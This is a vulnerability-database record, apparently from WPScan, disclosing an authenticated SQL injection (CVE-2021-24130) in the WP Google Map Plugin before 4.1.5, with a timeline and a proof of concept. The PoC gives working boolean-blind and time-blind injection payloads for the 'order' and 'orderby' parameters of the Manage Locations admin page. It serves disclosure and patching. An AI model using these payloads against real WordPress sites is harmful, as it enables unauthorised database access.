Unvalidated input in the WP Google Map Plugin WordPress plugin, versions before 4.1.5, in the Manage Locations page within the plugin settings was vulnerable to SQL Injection through a high privileged user (admin+).
{"wpvulndb": [{"lastseen": "2021-02-15T22:32:03", "bulletinFamily": "software", "cvelist": ["CVE-2021-24130"], "description": "The Manage Locations page within the plugin settings was vulnerable to SQL Injection through a high privileged user (admin+). Edit (WPScanTeam): September 8th, 2020 - Confirmed & Escalated to WP plugins team September 8th, 2020 - WP plugins team investigating November 25th, 2020 - No updates, disclosing December 8th, 2020 - v4.1.4 released, issue still present (improper fix) January 27th, 2021 - v4.1.5 released, fixing the issue\n\n### PoC\n\n\\- Vulnerable parameters: `order` and `orderby` 1\\. Add at least two locations (via /wp-admin/admin.php?page=wpgmp_form_location) and execute sleep query: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order;=desc&orderby;=(sleep(5)) 2\\. The request will be delayed by 10 seconds. \\--- Parameter: #1* (URI) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order;=asc&orderby;=(SELECT (CASE WHEN (2605=2605) THEN '' ELSE (SELECT 3517 UNION SELECT 5558) END)) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order;=asc&orderby;=(CASE WHEN (6922=6922) THEN SLEEP(5) ELSE 6922 END) \\--- \n", "modified": "2021-02-01T11:01:42", "published": "2020-11-25T00:00:00", "id": "WPVDB-ID:46AF9A4D-67AC-4E08-A753-A2A44245F4F8", "href": "https://wpscan.com/vulnerability/46af9a4d-67ac-4e08-a753-a2a44245f4f8", "type": "wpvulndb", "title": "WP Google Map Plugin < 4.1.5 - Authenticated SQL Injection", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "wpexploit": [{"lastseen": "2021-02-15T22:32:03", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-24130"], "description": "The Manage Locations page within the plugin settings was vulnerable to SQL Injection through a high privileged user (admin+). Edit (WPScanTeam): September 8th, 2020 - Confirmed & Escalated to WP plugins team September 8th, 2020 - WP plugins team investigating November 25th, 2020 - No updates, disclosing December 8th, 2020 - v4.1.4 released, issue still present (improper fix) January 27th, 2021 - v4.1.5 released, fixing the issue\n", "modified": "2021-02-01T11:01:42", "published": "2020-11-25T00:00:00", "id": "WPEX-ID:46AF9A4D-67AC-4E08-A753-A2A44245F4F8", "href": "", "type": "wpexploit", "title": "WP Google Map Plugin < 4.1.5 - Authenticated SQL Injection", "sourceData": "- Vulnerable parameters: `order` and `orderby`\r\n\r\n1. Add at least two locations (via /wp-admin/admin.php?page=wpgmp_form_location) and execute sleep query:\r\n\r\nhttps://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=desc&orderby=(sleep(5))\r\n\r\n2. The request will be delayed by 10 seconds.\r\n\r\n---\r\nParameter: #1* (URI)\r\n Type: boolean-based blind\r\n Title: Boolean-based blind - Parameter replace (original value)\r\n Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(SELECT (CASE WHEN (2605=2605) THEN '' ELSE (SELECT 3517 UNION SELECT 5558) END))\r\n\r\n Type: time-based blind\r\n Title: MySQL >= 5.0.12 time-based blind - Parameter replace\r\n Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(CASE WHEN (6922=6922) THEN SLEEP(5) ELSE 6922 END)\r\n---\r\n", "cvss": {"score": 0.0, "vector": "NONE"}}]}